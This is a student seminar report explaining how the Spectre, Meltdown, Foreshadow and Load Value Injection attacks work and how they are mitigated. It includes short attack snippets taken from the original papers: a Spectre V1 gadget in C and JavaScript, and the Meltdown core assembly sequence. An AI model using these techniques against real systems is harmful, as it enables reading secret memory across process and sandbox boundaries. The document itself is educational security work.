seminar report Seminar: Embedded Systems in summer term 2020

Spectre & Meltdown A tamed ghost?

Jonas Zeunert Technische Universität Kaiserslautern, Department of Computer Science

Note: This report is a compilation of publications related to some topic as a result of a student seminar. It does not claim to introduce original work and all sources should be properly cited.

Spectre and Meltdown are security attacks against the fundamental principles of out-of-order and of processors dating back until 1996. Even though many people have heard about their impact their principles are often unknown even though they are not that hard to understand with a bit of background knowledge. Since a programmer is in responsibility of the security of his own code it should be a very important topic for him to understand exactly at which points of his code it is attack-able by Spectre vulnerabilities. So in this seminar we will have a look in detail about the principles and techniques used by Spectre and Meltdown attacks.

1 Introduction

In this seminar we will look at the security breaches Spectre and Meltdown. They are the first practical example of hardware based side-channel attacks which were found in 2018 in parallel by Google’s Project Zero and Kocher et al. [15] at the University of Graz. Spectre is as of today still not fully mitigated since there are always new variants coming out while the mitigations which solve the problem behind Meltdown sometimes are disabled because of performance im- pacts.

These attacks totally shifted the general awareness of hardware based attacks since they are more than easy exploitable via web-browsers and beforehand side-channel attacks were seen as an attack vector for only breaking cryptographic systems in a academical view but not for breaking arbitrary systems. Their ability to bypass protection of virtual machines or sandboxes makes them extremely viable in the view of the continuously growing cloud computing market and is therefore a big threat to all of such systems.

We try to get an understanding on the history of the attacks, their impact, their function- ality and their mitigations and try to answer the question if this new ghost that appeared in the security realm was able to be finally tamed with the measures taken until today or if it is something that will eventually haunt us a much longer time.

The rest of this paper is structured as follow: First we will get the necessary technical back- ground in section 2. This covers the basics of side-channel attacks and speculative execution and other things which are needed to understand the attacks. Then in section 3 we will talk about

1 the history and the evolution of the attacks. How the first side channel attacks were discovered and how everything evolved to today’s stand and also try to classify the impact of this. In the next section 4 we will actually take a look what the idea behind Spectre and Melt- down is and how they work. Afterwards in section 5 we will discuss possible mitigations taken both from software (5.1) and hardware (5.2) perspective. Finally in the last section 6 we will discuss if it was possible to tame the ghost introduced with Spectre and Meltdown or if it was not.

2 Technical Background

Before describing how spectre and meltdown work in detail it is necessary to understand the underlying techniques which are combined for the Spectre like attacks.

In this section we will take a look at the principles of caches, side channel attacks, out-of-order execution and branch prediction.

2.1 CPU Cache A CPU cache is a small sized but also very fast memory in a computer system located near the execution unit of the CPU. Its main purpose is to cache often used data so the data does not have to immediately be read from and written back to the main memory which is for Von- Neuman machines the biggest bottleneck in computation .

Modern CPU’s typically have three levels of caches which are increasingly closer to the ALU which makes accesses faster but also scratch the possible size. To get an example of modern cache structures an AMD Ryzen 9 3900 [2] has 32KB level 1 cache and 512KB level 2 cache for every single core. The level 3 cache is typically shared between all cores and has about 64MiB.

A cache is organized in lines and sets. A line contains multiple bytes of data while there are multiple sets containing the lines. This is helpful to match any given main memory address to a cache line and is important to understand for different side-channel attacks.

2.2 Side-channel attacks Let us first get a definition for the term:

A side-channel attack is an attack enabled by leakage of information from a physical cryptosystem by an unintended channel. Characteristics that could be exploited in a side-channel attack include timing, power consumption, and electromagnetic and acoustic emissions. [22]

So we see it is important for a side channel attack that some (here cryptographic) information is getting leaked on a channel that was not intended to leak information. Often it is not even

2 intended to communicate any information like power consumption.

Standaert [25] goes further and subdivides side-channel attacks in both invasive or non-invasive and active or passive. (Non-)Invasion describes the ability if the attack requires a direct access to the physical chip or not and active and passive distinguishes if the attack changes the func- tionality of the original algorithm or if it does not. To give an example of this different attacks are classified in this scheme in figure 1

Invasive Non-Invasive Active Induce signals on a device to get back Flipping bits via a technique like information Rowhammer [13] to break page separation Passive Sensing the data on the DRAM bus Sensing electromagnetic signals emitted by a machine

Figure 1: Examples for the side-channel classification as of Standaert (2010) [25]

Since this domain is really large we will concentrate in this paper on the non-invasive tech- niques of cache based side-channel attacks which are the essential functionalities behind Spectre and also Meltdown.

2.3 Cache based side-channel attacks Cache based side-channel attacks can be classified with the scheme above as non-invasive pas- sive attacks. Since they are only based on accessing the cache which does not require any direct physical interaction they are non-invasive and even though they mess around with the cache this does not directly impact any behaviour of any program and therefore are passive.

Most often they rely on the ability of the cache to decrease the time of memory accesses which is as of today really slow in comparison to registers which are located near the execution units. If a given data is already in the cache the execution of an algorithm is much faster than if it was not in the cache. This timing offset allows to draw conclusions about the accessed address and therefore about the actual data given the algorithm is known.

Even though in present time there are many known cache based side-channel attacks it is sufficient to concentrate on the following three which are also used by Kocher et al. [15] in the original spectre paper: Flush+Reload (2.3.1), Evict+Reload (2.3.2) and Prime+Probe (2.3.3).

2.3.1 Flush+Reload Flush+Reload observed by Yarom et al. [29] is an attack which works with the clflush operation of the x86 processor architecture which erases all cache lines in all three cache levels. It also relies on the function of modern operating systems to share memory pages between processes and in its

3 more aggressive form of memory de-duplication where arbitrary similar looking pages are shared.

Basically Flush+Reload works in three phases: 1. Flush the cache line which is observed with clflush 2. Wait for the victim to access the cache line 3. Probe the cache timing of the memory line by reading from cache associated data which is shared through page sharing The most critically part on this is the wait time since if you either probe to early or to late or even in the same time one could miss information. Also this only works if the memory pages are shared so one can access the difference between the instantiation of a shared library.

2.3.2 Evict+Reload Evict+Reload is a development from Flush+Reload made by Gruss et al. [11] It generalizes the approach so that not only specific binaries can be attacked but instead one can read arbitrary information from caches. The attack is based on templates which are automatically generated by profiling the cache hit ratio of a specific event like a keystroke which the attacker wants to catch. This generated tem- plate is afterwards used to match the timings of other program instantiations and the attacker is able to receive arbitrary data which he has profiled.

2.3.3 Prime+Probe Prime+Probe first described by Osvik et al. [21] in 2006 as a first-level cache attack against AES was further investigated by Liu et al. [18] in 2015 who shown that this attack can be practical to read data on last level caches. As an example this can be useful to extract data between virtual machines. The idea behind Prime+Probe is that an attacker first primes the cache by filling every cache line with its own data afterwards idles a bit so that he can probe at the end which cache lines are replaced and with this can draw conclusions about which memory addresses are accessed.

With this information an attacker can as in the easily draw conclusions about the value in a specific implementation of e.g. a specific GnuPG implementation or sometimes it is enough to restore the whole secret.

2.4 Out-of-order execution Out-of-order execution is another technique used for many years to speed up computation pro- cess by computing code not strictly in order as it is programmed and compiled. If some instructions does not have any dependencies in computation and one has got multi- ple Arithmetic-Logic Units (ALU) at disposal it is possible to run these in parallel on micro- architectional level.

4 But the most important thing about out-of-order execution is that it must be transparent to the original intend of the code. So in the perspective of a programmer it should look like the code is executed in order and there should be no hazards.

2.5 Branch prediction One of the biggest speed impacts in today’s processor units was the invention of branch pre- diction which is also called speculative execution. It increases the flow of data in multi-stage pipelines by filling "holes" which arise due to conditional branches in code.

In more detail if there is a conditional branch typically the processor has to halt with its execution until it knows the outcome of the branch to go further with instructions. This cre- ates bubbles in the pipeline which hits performance since the computer can not do anything in this cycles. Therefore the branch predictor of the CPU predicts with a given strategy (which could be exemplary "always take the branch") the outcome and continues computing as if it is predicted true. When the real result of the branch is arriving it either discards all calculations if it was wrong or otherwise it saved a lot of cycles. This is especially important in case of loop branches where a good prediction can make a big performance impact.

A loop which often happens to be in some code is the on seen in figure 2 1 written exemplary in C. As one can easily see the loop condition will be true 100 times so predicting always true would only lead to just a single false positive at the 101st time with the strategy always true but else-wise the CPU could do the execution in parallel as much execution units it has at hand.

1 for(int i = 0; i < 100; i++) { 2 array[i] = i; 3 } 4

Figure 2: Example loop which can be accelerated by branch prediction.

Modern CPU’s got a dynamic branch predictor which trains itself with the already past branches. So as an example if a given branch was taken the last ten times it is likely that it will be also taken the eleventh time. But it is very important that any traces of this behaviour are revoked if it predicts false like registers and stalled memory writebacks and caches. The last does not happen and therefore enables Spectre and Meltdown like attacks.

2.6 Return-oriented programming Return-oriented programming is a technique for exploiting buffer overflow vulnerabilities in the presence of several security techniques like WXˆ or Address Space Layout Randomization

1In real environments any compiler would speed up this loop by simply unrolling it which would then be speed up by the out-of-order execution.

5 (ASLR). In an unsecured environment the attacker would overflow the stack with the payload he wants to be executed. Since several defense mechanisms prevent such attacks with return-oriented programming the attacker tries to only override the function’s return addresses which is normally pushed on the stack and tries to find gadgets in the code to jump to where he can either execute arbitrary instructions or call a library function which loads his own code. With this so called "gadgets" it is possible to execute arbitrary code.

3 History and Evolution

The first academically known side channel attack in modern times called "Tempest" reaches back to 1943 where a researcher at the Bell Telephonic Laboratories discovered that the operation of a cryptographic typewriter caused spikes on a nearby oscilloscope which could be translated to the transmitted message. [6]

Afterwards the topic’s attention faded a bit away until Paul Kocher released it’s paper about "Timing Attacks on Implementations of Diffie-Hellmann, RSA, DSS and Other Systems" in 1995 [16] which brought back attention to such types of attacks. There were many speculations how these types of attacks could be practical in 2003 Tsunoo et al. [26] showed how to successfully reduce the complexity of breaking the - until this day - state of the art encryption standard Data Encryption Standard (DES) with cache attacks.

Then afterwards many different ways to use different side channels like electromagnetic radi- ation, power consumption or microarchitectional chaches were found which finally lead to the until now biggest part of this history with the release of Spectre and Meltdown which was found at the same time by Kocher et al. [15] & Lipp et al. [17] and Yann Horn of Google Project Zero.

This finally opened Pandora’s box because afterwards many similar attacks were found and continuously there are always new variants are released. These include 8 different attacks called Spectre-NG which were first noted by the German com- puter magazine C’t in May 2018 [12]. These are different attacks to exploit speculative execution like spectre but have very different flaws like in one the attacker does not need to have control over some memory of the attacked program or in the case of NetSpectre [24] which was released in July 2018 does not even require an attack to run code on a remote machine after all but only using common network functionalities.

In August 2018 then another big thing called (found in January 2018 by Van Bulk et al. [27]) got released which even though similar to Spectre attacks the SGX enclave of processors which was until this point in time considered a totally secure code execution platform for holding secrets which even the machines owner should not access.

Furthermore in 2020 Load Value Injection was discovered by Van Bulk et al. [28] which works with the faults of Intel processors and the techniques of Spectre to receive data from arbitrary

6 load instructions.

Most recent in August 2020 the researchers behind the Foreshadow attack released a comment that all mitigations against the Spectre attacks are made by false understanding about the principles that lay behind them and until the fundamental problems are getting fixed there will always be new Spectre-like attacks. [4]

3.1 Impact As we have seen in the previous section the discovery of Spectre and Meltdown have brought the topic of side channel attacks and speculative execution a lot of attention. It totally discarded the assumption that was most common that the underlying hardware is executing correctly and attacks against it are only of academical nature. Beforehand security researchers mostly focused on finding bugs in software and exploiting them.

Figure 3: Evolution of spectre-alike security flaws as shown in "A Systematic Evaluation of Transient Execution Attacks and Defenses" by Canella et al. [3]

The original spectre and meltdown papers led to a wide range of similar attacks as shown in figure 3. This figure describes their systematic analysis of Spectre and Meltdown attacks. Since so many varieties of them did appear after the initial release they tried a systematic approach to find all possible combinations of the attacks. The ones highlighted in blue are the already ex-

7 isting and the ones in red are the ones which should be possible but have not been researched yet.

Since speculative execution is present in commercial CPU’s dating back to the 1990 and the Meltdown vulnerability affects Intel processors starting from 2011, fixing their problems in hard- ware will require to replace nearly every CPU which is in use today and one can easily imagine how long something like this will take when we finally find a processor architecture which is not vulnerable to Spectre attacks.

Beside the circumstance that it brought a totally new attack vector on computer systems into the game their mitigations also had some kind of impact which get especially relevant in large scale data centers. The performance hit highly depends on the hardware configuration as well as the algorithms used since most patches change microcode of the processor. [14] So one can not deviate a simple formula like patch = performance_impact% but it is possible to say that the performance impact of the patches are somewhere between 1% and 20% which is less than initially feared of about 40%-60% but it is still enough that most often it is pondered if it is meaningful to fully mitigate the security breaches.

4 Functionality

Spectre as well as Meltdown2 work by exploiting some sort of out-of-order execution which leaves unintended traces in processor caches. While Spectre is an attack against binaries by finding specific usable gadgets, Meltdown is more a fault attack of the implementation of Intel processors and some of ARM.

Both of them detect traces in the CPU’s cache left by out-of-order execution which exist be- cause the executed operations in out-of-order execution are only reverted in memory, registers and pipelines but not in caches since the cache is a separate unit of the CPU and does not get informed that some operation was reverted. This creates a side channel which can be read out by an attacker.

So in general these attacks can be split up in three main steps:

1. Bring the cache in a homogeneous state 2. Trick the CPU into speculatively executing something not intended 3. Read out the data left over in the cache through timing attacks

We will discuss this general approach in more detail by investigating the three main variants of the security breaches: Spectre V1 (4.1.1), V2 (4.1.2, Meltdown (4.2), Foreshadow (4.3) which is a development from Meltdown and Load Value Injection (4.4) which combines the approaches.

2Which sometimes is also called Spectre V3 because of its similarities

8 4.1 Spectre As already stated Spectre is an attack against a binary so in order to leak information one has to analyze a program (most often a shared library) find specific instruction sequences. The main thing is that these instructions somehow need to alter memory and therefore also the cache like a x86 "move" instruction does. Also there must be some kind of speculative execution involved which for Spectre V1 it is just a conditional branch while for Spectre V2 there are only the return jumps of function calls are used which also can trigger speculative execution and happens in almost every program.

Even though there are many more variants to Spectre which all in their own way exploit a different behaviour of programs it should be necessary to understand the two released in the first paper which even though not the sophisticated ones they give a good understanding what went wrong. The first variant called Spectre V1 exploits the conditional misprediction of branches. The second variant (Spectre V2) exploits the poisoning of indirect branches. They both will be discussed in the following sections.

4.1.1 Exploiting Conditional Branch Misprediction (Spectre V1) Let us look into detail how a Spectre V1 exploitation works. For Spectre V1 the code flow must have some branch involved to exploit speculative execution. In figure 4 we see such typical code sequence for misuse of Spectre V1 attacks which he could find in a shared library, kernel code or maybe in the implementation of a browser where he could execute some JavaScript.

In general such an attack includes the following steps: At first an attacker would train the branch-predictor by calling the function multiple times with an in-bound value of x. This leads to a situation where the CPU would assume that the conditional branch is always true and assumes this also in the next call. Afterwards it is necessary to somehow bring the cache in a homogenous state known to the attacker either by calling the clflush instruction on x86 machines to erase it or by filling it with known data to start a Flush+Reload or correspondingly a Prime+Probe attack after speculative execution. Then the attack begins and the function is called with a value for x out of bounds. Since we trained the branch-predictor to assume the branch is true and flushed the cache so the bounds of array1[x] are not known it speculatively executes the next line while waiting for the size of array1 and loading array1[x] into the cache. When the value of array1_size arrives everything gets reverted but the attacker can start prob- ing array2. So he continuously checks the timings for reading of array2 from 0 to 256. Only a single one of this accesses will be fast and this is logically the value of array1[x] which was not known to the attacker beforehand.

Even though this attack requires comprehensive understanding of the attacked software it is more than viable for widely used software like web-browsers, operating systems or safety-critical

9 1 if (x < array1_size) 2 y = array2[array1[x] * 256]; 3

Figure 4: A typical Spectre V1 code flow where the attacker is in control of x systems like encryption software.

To also show such an approach in figure 5 is an example implementation shown how Spectre can even be exploited in a scripting language like JavaScript which can be used to bypass sand- boxing of modern browsers.

1 if (index < simpleByteArray.length) { 2 index = simpleByteArray[index | 0]; 3 index = (((index * TABLE1_STRIDE)|0) & (TABLE1_BYTES-1))|0; 4 localJunk ^= probeTable[index|0]|0; 5 } 6

Figure 5: Implementation of a Spectre V1 attack in JavaScript.

In the example the constant TABLE1_STRIDE is 4096 and TABLE1_BYTES is 225. So first the branch predictor is trained by calling this code snippet about 1000 times with in-range values but in the last call with a value out of bounds. The variable localJunk is just there so that the JIT compiler of JavaScript does not optimize out the operations and the "|0" is there to hint it that the resulting value is an integer. With this the speculative execution is triggered and one has to read out the value afterwards which is not that simple in JavaScript since there are no instructions like CLFLUSH which can be called. But the cache can also be evicted by reading out a series of addresses at a 4096-byte interval out of a large array. Afterwards the secret value can be read out from the cache status of probeTable[n*4096] with n in an interval of [0, 256].

4.1.2 Poisoning Indirect Branches

Poisoning Indirect Branches also known as Spectre V2 is a technique that is more general than Exploiting Conditional Branches since it does not require an explicit indirect branch but uses indirect branches that emerge from function returns. More than often a jump to a function in program code is in dependence of a register or memory address. So when the attacker is able to wipe out the cache before the return of the function the CPU begins speculating about it and tries executing the value which is actually written in the register of the indirect jump. Most often this is limited to the memory range of the victim process but this can lead to situations where execution is taking directions which would never

10 occur in normal program flow.

1 class Base { 2 public: 3 virtual void Foo() = 0; 4 };

6 class Derived : public Base { 7 public: 8 void Foo() override { ... } 9 };

11 Base* obj = new Derived; 12 obj->Foo(); 13

Figure 6: Example C++ code which leads to an indirect branch which could be exploited for Spectre V2.

A C++ example which gives an idea when a indirect branch occurs is given in figure 6. When overriding an abstract function in a base class and only having a pointer to the base class when accessing it the system has to look up the address where the function lies in memory from the virtual address table since it is not known at compile time. This resulting indirect branch can be exploited by an attacker to read some arbitrary data from the program into the cache as long as the CPU is waiting for the real address.

For the CPU to better predict such indirect branches its branch predictor utilizes the branch history buffer which keeps track of indirect jumps. The attacker would train it beforehand by filling it with erroneous branches and thus tricking it into making a jump to a gadget not in- tended by the original program. From this load instructions are executed which somehow alter the state of the cache. This procedure is somehow similar to Return-Oriented programming described above and even though the executed sequence is limited in its execution time it neither needs to terminate cleanly since the CPU revokes the speculative execution nor does it leave traces because the information attacked is received via side-channels.

The rest of the attack works similar to Spectre V1 by reading out the traces left in the cache with cache based side-channel attacks.

4.2 Meltdown Meltdown sometimes also called Spectre V3 found by Lipp et al. in 2018 [17] is an attack which only works on all Intel processor dating back to 2011 and some ARM processors. It focuses on reading kernel memory from an arbitrary user-space process by exploiting architectional faults

11 in these processors. The main flaw behind Meltdown is the assumption that when something is executed out-of-order and gets discarded due to an exception everything gets reverted and there are no further checks which protect the memory and arbitrary addresses can therefore be read.

1 raise_exception(); 2 // the line below is never reached 3 access(probe_array[data * 4096]); 4

Figure 7: A pseudo code example of the mechanic of Meltdown.

We can analyze this behaviour by the simple pseudo code example in figure 7 which shows what goes wrong in a CPU when a Meltdown attack is executed. In affected processors when an exception occurs the next instruction could possibly be already executed nevertheless because of out-of-order execution. Even though the results get reverted in memory and registers in the cache this does not happen due to the fact that it is its own subsystem and an attacker could read it through some cache based side channel attack such as Prime+Probe (2.3.3). Meltdown bypasses all software and hardware defense features which are implemented until the day of its release such as (Kernel-)Address-Space-Layout-Randomization ((K)ASLR) or CPU based features like Supervisor Mode Access Prevention (SMAP) or No Execute (NX).

Figure 8: Physical memory is completely mapped with an offset in kernel-space as seen on the blue address.

To see why arbitrary addresses can be read out in figure 8 it is shown that all real addresses are mapped into kernel-space because the kernel typically has to perform actions on user mem- ory pages.

To get into more detail when we read arbitrary memory that is not in our address range an exception in the kernel gets triggered which handles the segmentation fault by terminating the process which tries to read the protected memory. Therefore this behaviour must be handled by the attacking process else wise it gets terminated. There are two different possibilities to

12 handle this:

The first trivial approach is to handle the exception by forking the attacking process just be- fore the memory access. The forked process gets killed and the attacking process can thereafter read out the memory. Since forking is a bit costly it would be better to just install a signal handler handling this.

The other approach is to trick the processor into just speculatively executing the memory read by branching it and train the branch predictor to take the branch. This leads to a situation even though the exception is raised it gets un-winded when normal execution flow is going on.

Combining this Meltdown procedures as following:

1. An arbitrary memory address which is inaccessible to the attacker is read into a register 2. The value at the address is loaded into an probe array and the occurring exception is handled 3. With Flush+Reload the content of the probe array is read out by the attacker The above can be repeated with arbitrary memory so that in the end an attacker is able to read out the whole physical memory of a system.

The attack usually translates to an assembler sequence shown in figure 9 which is the core sequence of meltdown attacks.

1 ; rcx = kernel address 2 ; rbx = probe array 3 retry: 4 mov al, byte [rcx] 5 shl rax, 0xc 6 jz retry 7 mov rbx, qword [rbx + rax] 8

Figure 9: Core instruction sequence of Meltdown.

In register RCX is the kernel address which should be read out and in RBX is the probe array which constructs the side channel. In line 4 the leased significant byte of RCX gets loaded into AL (which represents the least significant byte of RAX). Afterwards the pipeline is tried to utilized as much as possible by the left-shift and retry. This ensures that the execution gets delayed as much as possible. This leads to an exception but there is a race condition between the raising of the exception and the transmission of the secret in line 7. In line 7 the the value of the read address gets multiplied by the page size. With a page size of 4KB our probe array is 256x4096 bytes for reading a single byte. This ensures that the

13 pre-fetching of memory does not load neighboring addresses and creating noise when reading out the value. Afterwards it gets moved to our probe array RBX.

On micro-architectional level the instruction in line 7 races against the exception and even though everything gets reverted afterwards there is a high possibility that the write to RBX is faster. Now the attacker just has to probe the timings of the RBX array which values are cached and gets the value of the read kernel address.

Since every physical address is somehow mapped to kernel memory the above steps just have to be repeated for every possible address and it is possible to read out the whole memory at a bandwidth of about 3.2KB/s up to 503KB/s.

4.3 Foreshadow

Foreshadow discovered by Van Bulk et al. [27] is like Meltdown an attack only viable on Intel CPU’s and especially targeting the secure enclave SGX which is a feature to protect the exe- cution of user software. It allows an attacker not only to read out the whole memory of the enclave (which should not be possible) but also to steal the private key and with this completely breaking it.

The attack works similar to Meltdown and is according to Intel a "L1 Terminal fault". The problem of accessing memory of the SGX lies in the fact that even though when a unprivileged access to the memory is made it does not raise an exception like Meltdown but instead the value in the cache is replaced by a dummy value. Therefore the race condition between exception and memory read of Meltdown can not be utilized. To counter this they revoke all access to the page table they want to read out by a call to the instruction "mprotect". This clears the present bit of the page table and an exception is thrown. Now the real value lies in the cache and can be read out by a side channel like Flush+Reload as it is also in the Meltdown attack.

4.4 Load Value Injection

Load Value Injection researched by Van Bulck et al. [28] most recent in 2020 is a technique which apply Spectre-like code gadgets with Meltdown data leakage. The attack only proceeds within the victim’s address space and with this bypass most of the mitigations against Meltdown like KAISER which will be explained in section 5.1.1.

The general approach can be seen in figure 10. An illegal value controlled by an attacker is loaded into a micro-architectional buffer which prepares the attack. This results that the value of B is tried to accessed by the victim but the value of A is illegaly served from the buffer. The CPU now executes the instructions depending of the gadget which lies at A.

14 Figure 10: The general approach of LVI as shown in LVI: Hijacking Transient Execution through Microarchitectural Load Value Injection [28]

A toy example what kind of code structure is needed can be seen in figure 11 where first in line 2 a value of the attacker gets loaded and afterwards a page fault occurs when dereferencing the double pointer which leads to the execution of the attacker’s value.

1 void call_victim(size_t untrusted_arg) { 2 *arg_copy = untrusted_arg; 3 array[**trusted_ptr * 4096]; 4 } 5

Figure 11: Example of LVI attackable code.

The authors state that every load instruction can be turned into a LVI attack and a de- fense against this attack requires an orthogonal approach which combine defenses against either Spectre and Meltdown.

5 Mitigations

There are several mitigation which were done and applied to operating systems, compilers and software directly after the release of the security breaches because of the responsible disclosure time. Some of them early on caused big trouble and had to be reverted and revised like the first Meltdown patch on Microsoft Windows 7 which enabled an attacker to even write arbi- trary memory regions. [7] They protect against the most critical parts of the attacks which are described in the papers but are claimed multiple times to not solve the underlying issues of Spectre and Meltdown which can only be fixed in hardware which did not happen until today.

In general one can classify the mitigations into three kinds: [23]

15 1. Reducing the accuracy of covert channel communication to eliminating it or making gad- gets unavailable which for example was done by Web-Browser manufacturers (5.1.4) 2. Aborting or preventing transient execution when accessing secrets (as an example here we can take retpoline 5.1.3) 3. Ensuring that secret data is unavailable which is what the KAISER 5.1.1 patch does

In this chapter we will discuss the software patches named Kaiser (5.1.1) and retpoline (5.1.3) which help protect software against data leakage and also discuss a complete in-hardware ap- proach to fix the issues finally.

5.1 Software Mitigations 5.1.1 KAISER KAISER developed by Gruss et al. [10] is a operating system patch mitigating only the Melt- down security breach by removing the mapping of user memory into kernel-space. This strictly separates user-space from kernel-space and therefore it is no longer possible to leak data through Meltdown.

It is a development from KASLR which hardens exploitation of bugs by randomizing kernel memory layout and is also recommended to be implemented in all operating system kernels by the authors of the Meltdown paper.

There are several challenges to overcome when isolating the memory ranges from user-space and kernel-space. The first problem are threads which are highly used in modern parallelized programming be- cause if the memory page structure of threads is modified upon a context switch this affects all other threads which are running for the same program. Furthermore there are several memory regions which must be shared between kernel and user- space and especially unmapping user-space and kernel-space would require rewriting of most parts of actual kernels.

The last challenge is more a performance one because switching the address space requires the Translation Lookalike Buffer’s (TLB) cache which manages the mapping of virtual to real memory addresses to be flushed which is a quite expensive operation and is nowadays optimized to happen as few as possible.

KAISER is a patch which accomplishes these challenges by multiple different approaches while reducing the overhead to a performance impact of only 0.28%.

To overcome the first problem they introduce shadow address spaces which maintains the par- allel kernel and user-space mapping by giving every process two separate address spaces which are replaced as needed on context switch by updating the corresponding register CR3. The second problem is solved by KAISER by only keeping the most necessary memory regions

16 of kernel-space mapped into user-space and vice versa. These include the Interrupt Request Table, the Global Descriptor Table, the Task State Segment and finally the thread stacks. Even though kernel-space is nearly entirely removed from kernel-space the same does not apply the same to user-space in kernel. They found this impractical since most operating systems rely on this system and followed the approach to make user-space memory non-executable in kernel- space. Furthermore they have disabled the global bits of kernel pages in the TLB which according to them makes no performance impact and is together with shadow address spaces a complete protection against leaking memory from kernel-space. The switches happening for the shadow address spaces does not require to flush the TLB cache and with this the performance impact is minimized.

Because of its good performance impact and complete protection against Meltdown 3 which does not require to recompile any software. As of today this patch is applied to most modern operating systems.

5.1.2 LFENCE LFENCE is a x86 instruction which blocks further execution until all operands are loaded. This ensures that the program code is serialized but since speculative execution is a hardware feature it can not prevent it from happening.

So it would only prevent Spectre V1 on conditional branches but not Spectre V2 with branch poisoning. Also it has several drawbacks: The first is that this really slows down execution and with this can only be used at really critical instructions. And with this it is in hand of the programmer who has to have a good understand- ing of speculative execution and has to carefully decide where to use this and it is more than likely that it is overseen in certain circumstances.

So even though it is a good start for a mitigation it does not fix the problem.

5.1.3 Retpoline Retpoline is a technique developed by Google [9] against poisoning indirect branches with the main idea that even though one can not hinder the CPU to speculatively execute one can trick it into the developer’s own speculative execution. The name composes from ret(urn) and trampoline which also describes the idea behind this to trap the function return in an infinite speculation until the required data arrived.

Since every call to a function is an indirect branch the idea behind retpoline is to trap the branch predictor of the CPU into just speculatively always the same code until the return ad- dress is computed.

3But not its successors like LVI as already stated

17 1 call set_up_target; (1) 2 capture_spec: (4) 3 pause; 4 jmp capture_spec; 5 set_up_target: 6 mov %r11, (%rsp); (2) 7 ret; (3) 8

Figure 12: Example x86 assembler which shows the implementation of retpoline

The implementation of retpoline can be seen in figure 12. The call to set_up_target (1) will push the address which corresponds to line 2 in the ample onto the stack to return to. set_up_target now changes the return address with a memory access (2). Since the CPU has to wait for the result of this access to arrive at (3) it speculatively returns to the address on the stack and there the retpoline technique comes on. The speculative execution is captured in this loop and when finally the address arrives after a few 100 circles this is discarded without accessing any information.

Since naturally the CPU has to wait for the memory address to jump to arrive retpoline has no performance impact. It just disables the builtin jump to already known prediction but this can be circumvented by manually giving this information at compile time for known indirect branches.

5.1.4 Timer Inaccuracy in JavaScript Another viable approach to make Side-Channel attacks impossible is to artificially reduce the accuracy of timers. Such approaches do not apply for every program but especially in sandboxed environments like browsers this was a measurement to be taken by all well-known browser manufacturers like Mozilla [20], Google [8] and Microsoft [19]. All of them made their high precision timers in their browsers inaccurate so that even though the security hole is still applicable and one can trick the CPU in wrong speculative execution it is no longer possible to read out data between different tabs at a cost that is negligible for most JavaScript used at websites.

5.2 Hardware Mitigations Since hardware mitigations require a long time to be tested and shipped until they can be ap- plied most patches until today where taken either in software or microcode of processors. Also the development departments of well-known processor manufacturers did announce that several tweaks to their architectures where made to somehow mitigate the issues but this is most often not public.

After all in 2020 Schwarz et al. [23] developed a hardware/software mixed approach called

18 ConTExT that requires only little tweaks in hardware but also some new concepts in program- ming but trying to mitigate the issue in general.

5.2.1 ConTExT As already stated ConTExT (Considerate Transient Execution Technique) is a general ap- proach to mitigate the whole spectre family by moving the responsibility up to the highest level of software development the actual code. Also it introduces a new non-transient bit which needs to be set for page tables and registers which indicates the CPU that it should use a dummy value instead of the actual if making a transient execution. This not only ensures that memory locations are protected against speculative attacks but also registers. After all ConTExT is an over all approach which affects every part of a computer system from processors which keeps track of the secrets to operating systems which is aware of secrets in registers when context switches, compilers who adapt the new secret annotation to machine instructions and the actual code which needs a new annotation for secret values.

It makes the assumption that in general it is distinguishable if a value is secret or not. This assumption has to be made by the programmer and for ConTExT he needs to annotate these values that they are secret. With this information the compiler can make an additional section in the resulting binary where secret values are stored. This section is hold by memory pages which have the non-transient execution bit set and every value in it is kept track by the hardware when in use by also storing this bit in the registers of the CPU. When such a value is needed in an execution and the CPU tries to predict it it first checks for the bit and when it is set it disables the speculative execution.

In the end the authors claim that this approach has a performance impact of 0% up to 338% while fully mitigating all known Spectre attacks and can even be easily adapted to every new variant that ever comes out.

6 Conclusion

With all this knowledge it is not hard to say that neither Spectre nor Meltdown are really a tamed ghost. Even though every actor in the game is actively trying to fix the urgent problems there is - until today - not really a general approach commonly adapted in processors to fix the problems of out-of-order and speculative execution. A real fix for the problems can only be with a total redesign of the processor architecture as seen in section 5.2 and this requires all hardware to be exchanged which will take centuries until it is completed. Until this point the only viable alternative is to proactively reacting to new variants and try to fix them in software as much as possible. After all this problem will bother us yet for a long time.

Furthermore have these attacks made side-channel attacks in particular but also hardware attacks in general a really popular scientific field and it is to be expected that these will make a much bigger impact in the future for attackers if they get more widely adopted and more

19 researchers are concentrating on this topic.

All discussions about mitigations for the attacks have always a big focus on performance which is in an economical sense understandable since the performance impact of speculative and out-of-order execution is too big to neglect. But since we are at a point where actual processor architectures can not keep up with Moore’s law and making the structures always smaller is coming to an end it is necessary to switch to new approaches for the architectures to improve performance further so it would be a good pos- sibility to take this chance for the future and develop new architectures which are not affected by Spectre nor Meltdown.

For the future it will be much more important that hardware engineers not only focus on performance at all cost but they have to shift their attention more to the security aspects of processors to ensure that the data of a user is protected even in hostile environments where multiple users share a single physical machine like virtual machines and cloud computing.

20 References

[1] CLFLUSH Documentation. Available at https://www.felixcloutier.com/x86/clflush. [2] AMD: AMD Ryzen Specification. Available at http://www.cpu-world.com/CPUs/Zen/AMD-Ryzen% 209%203900.html. [3] Claudio Canella, Jo Van Bulck, Michael Schwarz, Moritz Lipp, Benjamin von Berg, Philipp Ortner, Frank Piessens, Dmitry Evtyushkin & Daniel Gruss: A Systematic Evaluation of Transient Execution Attacks and Defenses. [4] Thomas Claburn: Foreshadow returns to the foreground: Secrets-spilling speculative-execution In- tel flaw lives on, say boffins. Available at https://www.theregister.com/2020/08/07/foreshadow_ strikes_back_boffins_find/. [5] Ryan Crosby (2018): SpectrePoC. Available at https://github.com/crozone/SpectrePoC. [6] Jeffrey Friedman (1972): Tempest: A signal problem. NSA Cryptologic Spectrum 35, p. 76. [7] Ulf Frisk (2018): Total Meltdown? Available at http://blog.frizk.net/2018/03/total-meltdown. html. [8] Google: Mitigating Side-Channel Attacks. Available at https://www.chromium.org/Home/ chromium-security/ssca. [9] Google: Retpoline. Available at https://support.google.com/faqs/answer/7625886. [10] Daniel Gruss, Moritz Lipp, Michael Schwarz, Richard Fellner, Clémentine Maurice & Stefan Mangard (2017): Kaslr is dead: long live kaslr. In: International Symposium on Engineering Secure Software and Systems, Springer, pp. 161–176. [11] Daniel Gruss, Raphael Spreitzer & Stefan Mangard (2015): Cache template attacks: Automating attacks on inclusive last-level caches. In: 24th {USENIX} 